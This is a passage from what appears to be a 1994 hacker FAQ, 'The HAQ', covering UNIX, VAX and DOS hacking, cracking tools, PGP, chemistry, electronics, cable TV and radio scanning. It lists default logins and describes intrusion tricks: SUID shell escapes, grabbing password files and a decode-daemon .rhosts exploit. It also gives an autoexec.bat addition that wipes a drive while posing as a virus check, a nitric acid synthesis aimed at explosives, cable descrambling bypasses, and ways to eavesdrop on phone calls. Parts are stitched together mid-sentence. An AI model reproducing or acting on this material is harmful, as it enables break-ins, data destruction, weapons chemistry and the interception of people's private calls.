7. Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, GO,
LOGON, JOIN, HELP, or anything else you can think off.
=====================================================================
VII. Screwing with the most widespread operating system on the net
(UNIX / AIX Hacking)
WHAT ARE COMMON DEFAULT ACCOUNTS ON UNIX?
(from Belisarius)
Common default accounts are root, admin, sysadmin, unix, uucp, rje,
guest, demo, daemon, sysbin. These accounts may be unpassworded
or the password may possibly be the same (i.e. username uucp has
uucp as the passwd).
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW IS THE UNIX PASSWORD FILE SETUP?
(from Belisarius)
The password file is usually called /etc/passwd
Each line of the passwd file of a UNIX system follows the following
format:
userid:password:userid#:groupid#:GECOS field:home dir:shell
What each of these fields mean/do---
userid -=> the userid name, entered at login and is what the
login searches the file for. Can be a name or a
number.
password -=> the password is written here in encrypted form.
The encryption is one way only. When a login
occurs the password entered is run through the
encryption algorithm (along with a salt) and then
contrasted to the version in the passwd file that
exists for the login name entered. If they match,
then the login is allowed. If not, the password is
declared invalid.
userid# -=> a unique number assigned to each user, used for
permissions
groupid# -=> similar to userid#, but controls the group the user
belongs to. To see the names of various groups
check /etc/group
GECOS FIELD -=> this field is where information about the user is
stored. Usually in the format full name, office
number, phone number, home phone. Also a good
source of info to try and crack a password.
home dir -=> is the directory where the user goes into
the system at (and usually should be brought
to when a cd is done)
shell -=> this is the name of the shell which is
automatically started for the login
Note that all the fields are separated by colons in the passwd file.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT DO THOSE *s, !s, AND OTHER SYMBOLS MEAN IN THE PASSWD FILE?
(from Belisarius)
Those mean that the password is shadowed in another file. You have
to find out what file, where it is and so on. Ask somebody on your
system about the specifics of the Yellow Pages system, but
discretely!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS A UNIX TRIPWIRE?
(from Belisarius)
Tripwire is a tool for Unix admins to use to detect password cracker
activity, by checking for changed files, permissions, etc. Good for
looking for trojan horses like password stealing versions of
telnet/rlogin/ypcat/uucp/etc, hidden setuid files, and the like.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
USING SUID/GUID PROGS TO FULL ADVANTAGE.
(from Abort)
A SUID program is a program that when executed has the privs of the
owner.
A GUID has the privs of the group when executed.
Now imagine a few things (which happen often in reality):
1. Someone has a SUID program on their account, it happens to allow
a shell to, like @ or jump to a shell. If it does that, after you
execute said file and then spawn a shell off of it, all you do
in that shell has the privs of that owner.
2. If there is no way to get a shell, BUT they leave the file
writable, just write over it a script that spawns a shell, and you
got their privs again.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I HACK INTO AN AIX MACHINE?
(from Prometheus)
If you can get access to the 'console' AIX machines have a security
hole where you can kill the X server and get a shell with
ctrl-alt-bkspce. Also by starting an xterm up from one you are not
logged in the utmp for that session because the xterms don't do utmp
logging as a default in AIX. Or try the usual UNIX tricks:
ftping /etc/passwd, tftping /etc/passwd, doing a finger and then
trying each of the usernames with that username as a password.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I INCREASE MY DISK QUOTA ON UNIX?
(from Prometheus)
A UNIX disk quota may be increased by finding a directory on another
partition and using that. Find another user who wants more quota and
create a directory for the other to use, one that is world writable.
Once they've put their subdirectory in it, change the perms on the
directory to only read-execute. The reason this works is that
usually accounts are distributed across a couple of filesystems, and
admins are usually too lazy to give users the same quotas on each
filesystem. If the users are all on one filesystem, you may be able
to snag some space from one of the /usr/spool directories by creating
a 'hidden' subdirectory like .debug there, and using that.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I FOOL AROUND ON XTERM / XWINDOWS?
(from Wildgoose)
Most x commands have a -display option which allows you to pick a
terminal to send to. So if you use bitmap to create a bitmap, or
download one, etc then:
xsetroot -bitmap bitmapname
[display the bitmap on your screen]
xsetroot -bitmap bitmapname -display xt2500:0
[display the bitmap on another xterm]
Other uses, try xterm -display xt??:0 will give someone else one of
your login windows to play with. They are then logged in as you
though, and can erase your filespace, etc. Beware!
Slightly irritating:
xclock -geom 1200x1200 -display xt??:0
[fills the entire screen with a clock]
Slightly more irritating:
Use a shell script with xsetroot to flash people's screens different
colors.
On the nastier side:
Use a shell script with xsetroot to kill a person's window manager.
Downright nasty:
Consult the man pages on xkill. It is possible to kill windows on
any display. So to log someone off an xterm you merely have to xkill
their login window.
Protect yourself:
If you use xhost - this will disable other people from being able
to log you out or generally access your terminal.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I TAKE ADVANTAGE OF THE DECODE DAEMON?
(from Caustic)
First, you need to make sure that the decode daemon is active.
Check this by telnetting to the smtp port (usually port 25), and
expanding user Decode. If it gives you something, you can use it.
If it tells you that the user doesn't exist, or whatever, you can't.
If the daemon is active, this is how to exploit the decode daemon:
1) uuencode an echo to .rhosts
2) pipe that into mail, to be sent to the decode daemon
(What happens: the decode daemon (1st) decodes the process, but
leaves the bin priveleges resident. (2nd) the echo command is
executed, because now the decoded message assumes the bin priveleges
[which are *still* active, even though the daemon didn't issue the
command]).
3) If this is done right, you will be able to rlogin to the sysem.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I GET THE PASSWORD FILE IF IT IS SHADOWED?
(from Belisarius)
If your system has Yellow Pages file managment:
ypcat /etc/passwd > whatever.filename
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW IS A PASSWORD ENCRYPTED IN UNIX?
(from UNIX System Security[p.147])
Password encryption on UNIX is based on a modified version of
the DES [Data Encryption Standard]. Contrary to popular belief, the
typed password is not encrypted. Rather the password is used as the
key to encrypt a block of zero-valued bytes.
To begin the encryption, the first seven bits of each character
in the password are extracted to form the 56-bit key. This implies
that no more than eight characters are significant in a password.
Next, the E table is modified using the salt, which is the first two
characters of the encrypted password (stored in the passwd file).
The purpose of the salt is to makae it difficult to use hardware DES
chips or a precomputed list of encrypted passwords to attack the
algorithm. The DES algorithm (with the modified E table) is then
invoked for 25 iterations on the block of zeros. The output of this
encryption, which is 64 bits long, is then coerced into a
64-character alphabet (A-Z, a-z, 0-9, "." and "/"). Because this
coersion involves translations in which several different values are
represented by the same character, password encryption is essentially
one-way; the result cannot be decrypted.
=====================================================================
VIII. Screwing with the most secure operating system on the net
(VAX/VMS Hacking)
WHAT IS VAX/VMS?
VAX: Virtual Address eXtension. Computer is desisgned to use memory
addresses beyond the actual hardware and can therefore run progs
larger than physical memory. Developed by Digital Equipment
Corporation (DEC).
VMS: Virtual Memory System. Also developed by DEC.
DCL: Digital Command Language. Similar to DOS batch language or
UNIX script language.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT ARE SOME OF THE DEFAULT VAX LOGINS?
Username Password
-------- --------
DECNET DECNET
DEFAULT DEFAULT
DEMO DEMO
unpassworded
FIELD FIELD
SERVICE
GUEST GUEST
unpassworded
OPERATOR OPERATOR
OPERATIONS OPERATIONS
SYSMAINT SYSMAINT
SERVICE
DIGITAL
SYSTEM SYSTEM
MANAGER
OPERATOR
SYSLIB
SYSTEST UETP
SYSTEST
SYSTEST_CLIG CLIG
SYSTEST
TEST
SUPPORT SUPPORT
DEC
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT ARE SOME OF THE BASIC COMMANDS FROM THE "$" PROMPT?
@: executes a DCL program
usage- @filename.com
ACCOUNTING: program that tracks usage of the system by users
CREATE: PASCAL compiler
usage- CREATE filename.pas
CREATE/DIR: create a subdirectory
DEL: delete files
usage- DEL filename.ext
DIR: list the contents of a directory
options- /FULL = full listing with all security info
/BRIEF = brief listing
* = wildcard for anything
% = wildcard for a specific character
EDIT: VMS editor, requires VT-220 terminal
HELP: brings up help info
LOGOUT: obvious
MAIL: send E-mail locally and to any connected networks
$PASSWORD: change your password
usage- $PASSWORD newpassword
PHONE: chat program
usage- PHONE changes the prompt to a '%', from there type in
the username you wish to talk to. If the user is on a
different node then enter nodename::username
PHOTO: record session
RUN: execute an executable file
SHOW: lets you look at alot of different stuff
usage- SHOW option
options- CLUSTER = VAX cluster, if any
DEFAULT = directory path and device
DEVICES = system devices (drives, modems, etc.)
INTRUSION = accounts being hacked, if any
MEMORY = obvious
NETWORK = network name and VAX's location in it
PROCESS = PROCESS processname shows status
QUOTA = disk space available for account
SYSTEM = system info
DAY = obvious
TIME = obvious
USERS = online users
TYPE: display file on terminal (same as DOS 'type' and UNIX 'cat')
SET FILE/PROTECTION: sets the Read/Write/Execute/Delete flags
usage- SET FILE/PROTECTION=OWNER[RWED] filename.ext
options- WORLD, GROUP, or SYSTEM can be used in place of OWNER
WORLD = all users in your world
GROUP = all users in your group
SYSTEM = all users with SYSPRV privileges
SET TERMINAL: controls terminal settings
usage- SET TERMINAL/option
options- WIDTH=80 = set width to 80 columns
ADVANCED_VIDEO = selects 124x24 lines
NOADVANCED_VIDEO = unselects 124x24 lines
ANSI_CRT = selects ANSI escape sequences
NOANSI_CRT = unselects ANSI escape sequences
AUTOBAUD = allows computer to select highest possible
baud rate
NOAUTOBAUD = turn off automatic baud selection
BROADCAST = allows receipt of SEND, MAIL and PHONE
messages
NOBROADCAST = prevents receiption of SEND, MAIL and
PHONE messages
DEVICE_TYPE=VT220 = set terminal type to VT-220
ECHO = enables echoing from DCL command line
NOECHO = disable DCL command line echoing
FULLDUP = enable full duplex
NOFULLDUP = disable full duplex
HANGUP = log off if no carrier
NOHANGUP = don't log off even if no carrier
INQUIRE = show device type of terminal
PAGE=43 = set display length to 43 lines
TYPE_AHEAD = enable type ahead function
NOTYPE_AHEAD = disable type ahead function
UNKNOWN = use for ASCII device types
WRAP = set wrap around feature
NOWRAP = unset wrap around feature
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT ARE COMMON VAX FILENAME EXTENSIONS?
COMPILER SOURCE CODE FILES
==========================
ADA = ADA compiler source code file
BAS = BASIC compiler source code file
B32 = BLISS-32 compiler source code file
C = C compiler source code file
COB = COBOL compiler source code file
FOR = FORTRAN compiler source code file
MAR = MACRO compiler source code file
PAS = PASCAL compiler source code file
PLI = PL/I compiler source code file
OBJ = object code created by compiler before linking
DCL LANGUAGE FILES
==================
CLD = DCL command description file
COM = DCL batch file
GENERAL FILES
=============
DAT = DATa file
DIR = subDIRectory file
EXE = EXEcutable program
HLP = text for HeLP libraries
LIS = system listing files (TYPE, PRINT, PHOTO)
LOG = batch job output
MEM = DSR output file
RNO = DSR source file
SIXEL = file for SIXEL graphics
SYS = SYStem image file
TJL = Trouble JournaL
TMP = TeMPorary file
TXT = text library input file
UAF = User Autorization File
MAIL FILES
==========
DIS = DIStribution file
MAI = MAIl message file
TXT = mail output file
EDT EDITOR FILES
================
EDT = command file for the EDT editor
JOU = EDT journal when problems occur
TPU = editor command file
=====================================================================
IX. Screwing with the most widespread operating system on PCs
(MS-DOS Hacks)
HOW TO REALLY **ERASE** A HARDDRIVE
(from Amarand)
Install a small program (in the Dos directory would be good) called
Wipe, by Norton Utilities. I am pretty sure that executing this
program, using the proper command line options, you can for one
better than formatting the hard drive. Wiping the information
changes each bit in the object (file, FAT, disk, hard drive) to a
zero...or a random bit, or an alternating bit instead of just
deleting the reference to it in the file allocation table. If you
just delete a file, or format a hard drive...with the new Dos you
would only need to let it run its course and then Unformat the drive.
Wipe, I have found, works much more effectively by first erasing the
file allocation table AFTER erasing the information the file
allocation table is used to find.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WRITING A .bat FILE TO 'WIPE' A DRIVE.
Add the following code to the end of autoexec.bat:
echo Please wait
echo Checking HardDisk for virii, this make take a while ...
wipe > nothing.txt
This prevents any output from Wipe being output.
=====================================================================
X. Finding out what that encrypted info is
(Cracking programs)
WHAT ARE PASSWORD CRACKING PROGRAMS?
(from Belisarius)
There are three main cracking programs. They are Crack, Cracker Jack
and Cops. The latest versions are 4.1 for Crack and 1.4 for Cracker
Jack. Crack and COPS run on UNIX and CJack runs on a PC. CJack1.3
runs on any x86 class and CJack1.4 needs at least a 386. To use any
of these requires access to an unshadowed password file.
They are not programs that try to login to an account. They take the
password file (/etc/passwd in UNIX is usually the name) and guess the
passwords.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHERE CAN I GET THESE PROGRAMS?
Crack: ftp.virginia.edu /pub/security
CrackerJack: bnlux1.bnl.gov /pub/pezz
COPS:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS WPCRACK?
WPCRAK is a cracker to break the encryption on WordPerfect files.
It works, but takes a long time to run.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS PKCRACK?
PKCRACK is a dictionary cracker for PKZIP. It works. It's
dictionary, but it works. Not all that well, as you may have to sift
through multiple possible passwords, but its better than nothing.
=====================================================================
XI. How do I keep my info secure
(PGP / Cryptology)
WHAT IS PGP?
(from Belisarius)
PGP stands for Pretty Good Protection, from a company called Pretty
Good Software. It is a public key encryption program for MS-DOS,
Unix, and Mac. You create a key pair. One private (secret) key
and a public key. The keys are different parts of the whole. I
distribute my public key and anyone who wants can grab it ad it to
their PGP keyring. Then when they want to send me a message they
encrypt it with PGP and my public key and then send it. Only I can
decrypt it because you need my secret key to decode it. (Trust me
you won't get my secret key) That is PGP. Please use it if you
want to communicate anything of a ahhhh....sensitive manner.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHERE CAN I GET PGP?
(from an archie search)
FTP sites for PGP=Pretty Good Privacy Public Encryption System
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
========
Unix PGP
========
Host 130.149.17.7
Location: /pub/local/ini/security
FILE -rw-rw-r-- 651826 Apr 5 1993 pgp22.tar.Z
Host arthur.cs.purdue.edu
Location: /pub/pcert/tools/unix/pgp
FILE -r--r--r-- 651826 Mar 7 1993 pgp22.tar.Z
Host coombs.anu.edu.au
Location: /pub/security/cypher
FILE -r--r--r-- 651826 Nov 4 22:28 pgp22.tar.Z
==========
MS-DOS PGP
==========
Host zero.cypher.com
Location: /pub/pgp
FILE pgp23a.zip
================
MS-DOS PGP SHELL
================
Host athene.uni-paderborn.de
Location: /pcsoft/msdos/security
FILE -rw-r--r-- 65160 Aug 9 20:00 pgpshe22.zip
Host nic.switch.ch
Location: /mirror/msdos/security
FILE -rw-rw-r-- 65160 Aug 9 22:00 pgpshe22.zip
Host plains.nodak.edu
Location: /pub/aca/msdos/pgp
FILE -rw-r--r-- 65430 Nov 26 18:28 pgpshe22.zip
=======
Mac PGP
=======
Host plaza.aarnet.edu.au
Location: /micros/mac/info-mac/util
FILE -r--r--r-- 323574 Apr 26 1993 pgp.hqx
Host sics.se
Location: /pub/info-mac/util
FILE -rw-rw-r-- 323574 Nov 5 11:20 pgp.hqx
Host sumex-aim.stanford.edu
Location: /info-mac/util
FILE -rw-r--r-- 323574 Apr 26 1993 pgp.hqx
=====================================================================
XII. Chemistry 101
(explosive/pyrotechnic component prep)
XIII. Fun things with solder, wires, and parts
(Underground electronics)
XIV. Watching television
(cable, Pay-Per-View(PPV), scrambling)
XV. What's on the radio waves?
(Radios and Scanning)
HOW TO MAKE NITRIC ACID:
(from Neurophire)
Nitric acid is not TOO expensive, but is hard to find except from
chemical supply houses. Purchases can be traced.(From TBBOM13.TXT)
There are several ways to make this most essential of all acids for
explosives. One method by which it could be made will be presented.
again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!
Materials: Equipment:
---------- ----------
sodium nitrate or adjustable heat source
potassium nitrate
retort
distilled water
ice bath
concentrated
sulfuric acid stirring rod
collecting flask with
stopper
1) Pour 32 milliliters of concentrated sulfuric acid into the retort.
2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of
potassium nitrate. and add this to the acid slowly. If it all does
not dissolve, carefully stir the solution with a glass rod until
it does.
3) Place the open end of the retort into the collecting flask, and
place the collecting flask in the ice bath.
4) Begin heating the retort, using low heat. Continue heating until
liquid begins to come out of the end of the retort. The liquid that
forms is nitric acid. Heat until the precipitate in the bottom of
the retort is almost dry, or until no more nitric acid is forming.
CAUTION: If the acid is heated too strongly, the nitric acid will
decompose as soon as it is formed. This can result in the
production of highly flammable and toxic gasses that may explode.
It is a good idea to set the above apparatus up, and then get away
from it.
Potassium nitrate could also be obtained from store-bought black
powder, simply by dissolving black powder in boiling water and
filtering out the sulfur and charcoal. To obtain 68 g of potassium
nitrate, it would be necessary to dissolve about 90 g of black powder
in about one liter of boiling water. Filter the dissolved solution
through filter paper in a funnel into a jar until the liquid that
pours through is clear. The charcoal and sulfur in black powder are
insoluble in water, and so when the solution of water is allowed to
evaporate, potassium nitrate will be left in the jar.
=====================================================================
XIII. Fun things with solder, wires, and parts
(Underground electronics)
HOW TO MAKE HIGH FREQUENCY TONES TO ANNOY SOMEONE?
(from Angel of Death with Belisarius)
The idea is to make a simple timing circuit to create a high freq
tone. The timing circuit is based upon the 555-chip and uses a
simple speaker to convert the pulses from the 555 into sound.
Required materials: 555 timer chip, 9 V battery, .01 uF capacitor,
100k potentiometer, tweeter speaker, wire
(the capacitor and resistor values can vary
although that changes the possible freqs)
-9V (GND)
[\ |
[s\ | ________ ________
[p \ | | \/ |
[e +-------+-------------------+--| 1 8 |-- +9V
[a | | | |
[k | | | /.01uF CAP | 5 |
[e +-+ +--|(------+-----------| 2 5 7 |
[r / | | \ | | 5 |
[ / | | | |
[/ +--------------- | ----------| 3 t 6 |----+
| | | i | |
| | | m | |
| | +9V --| 4 e 5 | |
| | | r | |
| | |__________________| |
| | |
| /\ | |
+----\ / \-----+-----------------------------------+
\/ 100k POT
555 Timer Pin Connections
-------------------------
Pin 1: Ground (-9V side of bat), one lead of tweeter, one lead
of capacitor
Pin 2: Pin 6 and other lead of capacitor
Pin 3: Other lead of the tweeter, one lead of the resistor
Pin 4: Pin 8 and the +9V
Pin 5: No connections
Pin 6: Pin 2 and the other lead of the potentiometer
Pin 7: No connections
Pin 8: Pin 4 and the +9V
=====================================================================
XIV. Watching television
(cable, Pay-Per-View(PPV), scrambling)
HOW IS CABLE TV SCRAMBLED?
(from Aero)
There are three main types of scrambling for cable TV: trap filters,
gernaral scrambling and addressable scrambling.
1. Trap filters. Located in the distribution box and physically
prevent the desired channel from reaching your house. All you see
when this techniques is used is theoretically static (i.e. a blank
channel). No filter is perfect, so some signal may reach your TV.
This is an older system of cable protection, and it is easy to bypass
(go out to the box and remove the filter).
2. General scrambling. This system scrambles the pay channels (all
the channels before they reach the box), and you need a special
decoder to unscramble them. The most common method of scambling is
to remove the sync signal. This is also easy to get around as you
can buy descramblers.
3. Addressable descramblers. The cable box receives the scrambled
channels, but the cable company sends signals to the box telling it
which ones should be unscrambled. This is the system used by most
pay-per-view systems. This is a little harder to defeat, but not too
bad if you have the right equipment/friends.
-=-=-=-=-=-=-=-=-=-=-=-=-=- END of THE HAQ2.07/2 -=-=-=-=-=-=-=-=-=-=-=-
**
Jun 13, 1994 19:54 from Belisarius
_____________
/ / / *** *** ****** ******
/ *** *** ********* *********
/ / *** *** *** *** *** ***
/ / *********** *********** *** ***
/ /_____ ______ *********** *********** *** ** ***
/ / / /_____/ *** *** *** *** *** *****
/ / / / *** *** *** *** ***********
/ / / /______ *** *** *** *** ***** ***
+---------------+
| THE HAQ |
| Edition 2.07 |
| 11 JUN 1994 |
+---------------+
File 3 of 3
=====================================================================
XV. Tuning in to what's on the radio waves
(Radios and Scanning)
WHAT DO I NEED TO START SCANNING?
There are to type of main scanner types (determined by the method of
radio reception): either crystal or programmable(synthetic) tuning.
Crystal tuning requires a specific crystal for each desired freq, at
====== ===============
1 46.610
2 46.630
3 46.670
4 46.710
5 46.730
6 46.770
7 46.830
8 46.870
9 46.930
10 46.970
The range on cordless phones is usually only a block or two. To
monitor someones calls use a small portable scanner and cassette
recorder and you will have a tape of all their calls.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I SCAN CELLULAR PHONE CONVERSATIONS?
Cellular telephones are a great source of info as they are used by
doctors, lawyers, and other big business. They are also a great
source of calling card numbers.
Cellular phones operate on a very simple premise. They receive on
one frequency and transmit on another freq in order to allow
simultaneous communication. The area is split into two bands
(Band A and Band B) which are split into 21 cells (hence the name
cellular) and each cell has 16 channels within it.
Cellular arrangment:
______ ______
/ \ / \
/ \ / \
/ Cell \______/ Cell \______
\ #1 / \ #5 / \
\ / \ / \
\______/ Cell \______/ Cell \
/ \ #3 / \ #7 /
/ \ / \ /
/ Cell \______/ Cell \______/
\ #2 / \ #6 / \
\ / \ / \
\______/ Cell \______/ Cell \
/ \ #4 / \ #8 /
Band A uses channels 1-333 and Band B uses channels 334-666. Usually
the first channel in each cell is the Data Channel (333 for Cell 1A,
331 for Cell 2A, etc.). There are simple formulas to calculate the
frequency for receive and transmit for each channel.
Transmit freq = (channel number * .030 MHz) + 870 MHz
Receive freq = (channel number * .030 MHz) + 825 MHz
So for Channel 333: T=879.990 MHz and R=834.990 MHz
FOR BAND A
==========
Cell #
Chan 1 2 3 4 5 6 7
1 333 332 331 330 329 328 327
879.990 879.960 879.930 879.900 879.870 879.840 879.810
834.990 834.960 834.930 834.900 834.870 834.840 834.810
2 312 311 310 309 308 307 306
879.360 879.330 879.300 879.270 879.240 879.210 879.180
834.360 834.330 834.300 834.270 834.240 834.210 834.180
3 291 290 289 288 287 286 285
878.730 878.700 878.670 878.640 878.610 878.580 878.550
833.730 833.700 833.670 833.640 833.610 833.580 833.550
4 270 269 268 267 266 265 264
878.100 878.070 878.040 878.010 877.980 877.950 877.920
833.100 833.070 833.040 833.010 832.980 832.950 832.920
5 249 248 247 246 245 244 243
877.470 877.440 877.410 877.380 877.350 877.320 877.290
832.470 832.440 832.410 832.380 832.350 832.320 832.290
6 228 227 226 225 224 223 222
876.840 876.810 876.780 876.750 876.720 876.690 876.660
831.840 831.810 831.780 831.750 831.720 831.690 831.660
7 207 206 205 204 203 202 201
876.210 876.180 876.150 876.120 876.090 876.060 876.030
831.210 831.180 831.150 831.120 831.090 831.060 831.030
8 186 185 184 183 182 181 180
875.580 875.550 875.520 875.490 875.460 875.430 875.400
830.580 830.550 830.520 830.490 830.460 830.430 830.400
9 165 164 163 162 161 160 159
874.950 874.920 874.890 874.860 874.830 874.800 874.770
829.950 829.920 829.890 829.860 829.830 829.800 829.770
10 144 143 142 141 140 139 138
874.320 874.290 874.260 874.230 874.200 874.170 874.140
829.320 829.290 829.260 829.230 829.200 829.170 829.140
11 123 122 121 120 119 118 117
873.690 873.660 873.630 873.600 873.570 873.540 873.510
828.690 828.660 828.630 828.600 828.570 828.540 828.510
12 102 101 100 99 98 97 96
873.060 873.030 873.000 872.970 872.940 872.910 872.880
828.060 828.030 828.000 827.970 827.940 827.910 827.880
13 81 80 79 78 77 76 75
872.430 872.400 872.370 872.340 872.310 872.280 872.250
827.430 827.400 827.370 827.340 827.310 827.280 827.250
14 60 59 58 57 56 55 54
871.800 871.770 871.740 871.710 871.680 871.650 871.620
826.800 826.770 826.740 826.710 826.680 826.650 826.620
15 39 38 37 36 35 34 33
871.170 871.140 871.110 871.080 871.050 871.020 870.990
826.170 826.140 826.110 826.080 826.050 826.020 825.990
16 18 17 16 15 14 13 12
870.540 870.510 870.480 870.450 870.420 870.390 870.360
825.540 825.510 825.480 825.450 825.420 825.390 825.360
Cell #
Chan 8 9 10 11 12 13 14
1 326 325 324 323 322 321 320
879.780 879.750 879.720 879.690 879.660 879.630 879.600
834.780 834.750 834.720 834.690 834.660 834.630 834.600
2 305 304 303 302 301 300 299
879.150 879.120 879.090 879.060 879.030 879.000 878.970
834.150 834.120 834.090 834.060 834.030 834.000 833.970
3 284 283 282 281 280 279 278
878.520 878.490 878.460 878.430 878.400 878.370 878.340
833.520 833.490 833.460 833.430 833.400 833.370 833.340
4 263 262 261 260 259 258 257
877.890 877.860 877.830 877.800 877.770 877.740 877.710
832.890 832.860 832.830 832.800 832.770 832.740 832.710
5 242 241 240 239 238 237 236
877.260 877.230 877.200 877.170 877.140 877.110 877.080
832.260 832.230 832.200 832.170 832.140 832.110 832.080
6 221 220 219 218 217 216 215
876.630 876.600 876.570 876.540 876.510 876.480 876.450
831.630 831.600 831.570 831.540 831.510 831.480 831.450
7 200 199 198 197 196 195 194
876.000 875.970 875.940 875.910 875.880 875.850 875.820
831.000 830.970 830.940 830.910 830.880 830.850 830.820
8 179 178 177 176 175 174 173
875.370 875.340 875.310 875.280 875.250 875.220 875.190
830.370 830.340 830.310 830.280 830.250 830.220 830.190
9 158 157 156 155 154 153 152
874.740 874.710 874.680 874.650 874.620 874.590 874.560
829.740 829.710 829.680 829.650 829.620 829.590 829.560
10 137 136 135 134 133 132 131
874.110 874.080 874.050 874.020 873.990 873.960 873.930
829.110 829.080 829.050 829.020 828.990 828.960 828.930
11 116 115 114 113 112 111 110
873.480 873.450 873.420 873.390 873.360 873.330 873.300
828.480 828.450 828.420 828.390 828.360 828.330 828.300
12 95 94 93 92 91 90 89
872.850 872.820 872.790 872.760 872.730 872.700 872.670
827.850 827.820 827.790 827.760 827.730 827.700 827.670
13 74 73 72 71 70 69 68
872.220 872.190 872.160 872.130 872.100 872.070 872.040
827.220 827.190 827.160 827.130 827.100 827.070 827.040
14 53 52 51 50 49 48 47
871.590 871.560 871.530 871.500 871.470 871.440 871.410
826.590 826.560 826.530 826.500 826.470 826.440 826.410
15 32 31 30 29 28 27 26
870.960 870.930 870.900 870.870 870.840 870.810 870.780
825.960 825.930 825.900 825.870 825.840 825.810 825.780
16 11 10 9 8 7 6 5
870.330 870.300 870.270 870.240 870.210 870.180 870.150
825.330 825.300 825.270 825.240 825.210 825.180 825.150
Cell #
Chan 15 16 17 18 19 20 21
1 319 318 317 316 315 314 313
879.570 879.540 879.510 879.480 879.450 879.420 879.390
834.570 834.540 834.510 834.480 834.450 834.420 834.390
2 298 297 296 295 294 293 292
878.940 878.910 878.880 878.850 878.820 878.790 878.760
833.940 833.910 833.880 833.850 833.820 833.790 833.760
3 277 276 275 274 273 272 271
878.310 878.280 878.250 878.220 878.190 878.160 878.130
833.310 833.280 833.250 833.220 833.190 833.160 833.130
4 256 255 254 253 252 251 250
877.680 877.650 877.620 877.590 877.560 877.530 877.500
832.680 832.650 832.620 832.590 832.560 832.530 832.500
5 235 234 233 232 231 230 229
877.050 877.020 876.990 876.960 876.930 876.900 876.870
832.050 832.020 831.990 831.960 831.930 831.900 831.870
6 214 213 212 211 210 209 208
876.420 876.390 876.360 876.330 876.300 876.270 876.240
831.420 831.390 831.360 831.330 831.300 831.270 831.240
7 193 192 191 190 189 188 187
875.790 875.760 875.730 875.700 875.670 875.640 875.610
830.790 830.760 830.730 830.700 830.670 830.640 830.610
8 172 171 170 169 168 167 166
875.160 875.130 875.100 875.070 875.040 875.010 874.980
830.160 830.130 830.100 830.070 830.040 830.010 829.980
9 151 150 149 148 147 146 145
874.530 874.500 874.470 874.440 874.410 874.380 874.350
829.530 829.500 829.470 829.440 829.410 829.380 829.350
10 130 129 128 127 126 125 124
873.900 873.870 873.840 873.810 873.780 873.750 873.720
828.900 828.870 828.840 828.810 828.780 828.750 828.720
11 109 108 107 106 105 104 103
873.270 873.240 873.210 873.180 873.150 873.120 873.090
828.270 828.240 828.210 828.180 828.150 828.120 828.090
12 88 87 86 85 84 83 82
872.640 872.610 872.580 872.550 872.520 872.490 872.460
827.640 827.610 827.580 827.550 827.520 827.490 827.460
13 67 66 65 64 63 62 61
872.010 871.980 871.950 871.920 871.890 871.860 871.830
827.010 826.980 826.950 826.920 826.890 826.860 826.830
14 46 45 44 43 42 41 40
871.380 871.350 871.320 871.290 871.260 871.230 871.200
826.380 826.350 826.320 826.290 826.260 826.230 826.200
15 25 24 23 22 21 20 19
870.750 870.720 870.690 870.660 870.630 870.600 870.570
825.750 825.720 825.690 825.660 825.630 825.600 825.570
16 4 3 2 1
870.120 870.090 870.060 870.030
825.120 825.090 825.060 825.030
FOR BAND B
==========
Cell #
Chan 1 2 3 4 5 6 7
1 334 335 336 337 338 339 340
880.020 880.050 880.080 880.110 880.140 880.170 880.200
835.020 835.050 835.080 835.110 835.140 835.170 835.200
2 355 356 357 358 359 360 361
880.650 880.680 880.710 880.740 880.770 880.800 880.830
835.650 835.680 835.710 835.740 835.770 835.800 835.830
